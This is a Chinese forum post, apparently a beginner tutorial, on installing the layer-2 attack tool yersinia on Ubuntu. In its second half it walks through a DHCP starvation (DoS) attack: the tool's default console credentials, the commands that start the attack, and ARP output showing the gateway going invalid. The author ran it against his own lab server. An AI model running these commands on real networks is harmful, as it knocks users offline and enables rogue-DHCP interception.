青春时代是一个短暂的美梦,当你醒来时,它早已消失得无影无踪了。
 
昨日:篇  今日:篇   总帖:篇   会员:
admin
夜月琉璃Lv19   
yersinia 入门     

看了一些网络安全的视频感觉yersinia这个软件非常强大,心中一阵窃喜.分享一下自己成果.不足之处请指教.yersinia支持的协议如下:

Spanning Tree Protocol (STP): 生成树协议   
Cisco Discovery Protocol (CDP): 思科发现协议   
Dynamic Trunking Protocol (DTP): 动态中继协议  
Dynamic Host Configuration Protocol (DHCP) 
Hot Standby Router Protocol (HSRP): 热备份路由器协议 
IEEE 802.1Q
IEEE 802.1X
Inter-Switch Link Protocol (ISL): 交换链路内协议   
VLAN Trunking Protocol (VTP): vlan干道协议  


下面先说一下安装.我选的是在虚拟机ubuntu中安装的,因为ubuntu安装在虚拟机中直接选择NAT链接不需要任何配置就能上网,而且安装起来方便.比centos5.红帽 fedora,安装起来方便.不过ubuntu安装完占有硬盘比较大.将近5的G吧.比较心疼空间.虚拟机安装unbuntu就不介绍了.提一点 就是安装完后 打开终端(应用程序-附件-终端)修改一下root的密码.修改的命令是:sudo password root 会提示你输入密码.因为yersinia只能root用户使用. 再说一下安装。很简单 ,下载一个yersinia的安装包(yersinia_0.7.1.orig.tar.gz)拷贝到/tmp中,解压成yersinia文件夹.在终端中运行命令:sudo apt-get install yersinia 然后一路回车.就安装成功了.好了,运行:sudo su 命令切换到root用户.提示输入密码.把你修改的密码打上 就进入了

[email protected]:/home/hejin#sudo su

[email protected]:/home/hejin# yersinia -h //帮助 呵呵
看显示:Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
       -V   Program version.
       -h   This help screen.
       -G   Graphical mode (GTK).
       -I   Interactive mode (ncurses).
       -D   Daemon mode.
       -d   Debug.
       -l logfile   Select logfile.
       -c conffile  Select config file.
  protocol   One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, stp, vtp.
有图形化界面幺.呵呵

调用出图形化界面,相信大家就能灵活的应用了.我攻击了自己架设的DHCP服务器很快就OK了.有时间,展示一下STP的攻击.因为环境需要自己架设.


3)、安装yersinia 
sudo apt-get install yersinia

ubuntu它会自动从官方的软件库中将yersinia的所有文件安装完成,不需要你因为对linux不熟悉而烦恼。

检查:

[email protected]:~# yersinia 
GNU yersinia 0.7.1 $Date: 2006/03/23 08:40:14 $
Try 'yersinia -h' to display the help.


MOTD: Waiting for my surround speakers Audiovector Mi1 Signature... :)
[email protected]:~# 
4)、安装ssh server(可选,避免每次进入到虚拟机,可通过ssh连接进去)

sudo apt-get install openssh-server

结果:

yersinia 的安装与使用 - k_hunter - 追梦的博客

 

 

4)ok ,yersina安装全部完成,我们可以通过它来实验一下攻击。


二、简单使用

2.1 yersina 帮助

Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
       -V   Program version.  //查看版本
       -h   This help screen.  //帮助命令
       -G   Graphical mode (GTK). //图形化界面
       -I   Interactive mode (ncurses). //交互模式
       -D   Daemon mode. //后台模式,笔者推荐
       -d   Debug. //调试械
       -l logfile   Select logfile.
       -c conffile  Select config file. //先写好相关攻击配置……
  protocol   One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, stp, vtp.

Try 'yersinia protocol -h' to see protocol_options help

Please, see the man page for a full list of options and many examples.
Send your bugs & suggestions to the Yersinia developers <
[email protected]>

 

MOTD: I would like to see romanian wild boars, could you invite me? :)
        Mail me at slay _at_ wasahero.org

 

2.1 yersina attack sample

登录用户名与密码:root/root

enable密码:tomac

[email protected]:~# telnet localhost 12000
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Welcome to yersinia version 0.7.1.
Copyright 2004-2005 Slay & Tomac.


login: root
password:

MOTD: Do you have a Lexicon CX-7? Share it!! ;)

yersinia> ena
Password:
yersinia# 
  cancel     Cancel running attack         
  clear      Clear stats                   
  cls        Clear screen                  
  disable    Turn off privileged commands  
  exit       Exit from current level       
  prueba     Test command                  
  run        Run attack                    
  set        Set specific params for protocols
  show       Show running system information
yersinia#

比如:dhcp 地址耗尽攻击

1、指定源接口

yersinia# set dhcp interface eth0

2、攻击开始

yersinia# run dhcp   1

下面是后面参数
  <0>   NONDOS attack sending RAW packet
  <1>   DOS attack sending DISCOVER packet
  <2>   NONDOS attack creating DHCP rogue server
  <3>   DOS attack sending RELEASE packet
  <cr>

3、检查

yersinia# show attacks 
   No.    Protocol    Attack
   ---    --------    ------
    0      DHCP       sending DISCOVER packet
yersinia# show dhcp attacks 
   No.    Protocol    Attack
   ---    --------    ------
    0      DHCP       sending DISCOVER packet

4、结果

攻击前:

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.105.14 --- 0x4
  Internet Address      Physical Address      Type
  172.16.105.1          00-09-43-30-4d-c1     dynamic
  172.16.105.23         00-0c-29-1f-cf-39     dynamic

攻击后:

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.105.14 --- 0x4
  Internet Address      Physical Address      Type
  172.16.105.1          00-00-00-00-00-00     invalid
  172.16.105.23         00-0c-29-1f-cf-39     dynamic

取消攻击后:5(秒)

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.105.14 --- 0x4
  Internet Address      Physical Address      Type
  172.16.105.1          00-09-43-30-4d-c1     dynamic
  172.16.105.23         00-0c-29-1f-cf-39     dynamic
  172.16.105.248        00-0c-29-76-f3-53     dynamic

 

注:附上命令参数

 2  已被阅读了343次  楼主 2017-10-27 20:49:06
回复列表

回复:yersinia 入门

桂公网安备 45010302000666号 桂ICP备14001770-3号
您的IP:54.81.166.196,2018-04-24 18:36:17,Processed in 1.07812 second(s).
免责声明: 本网不承担任何由内容提供商提供的信息所引起的争议和法律责任。
Powered by HadSky 5.4.4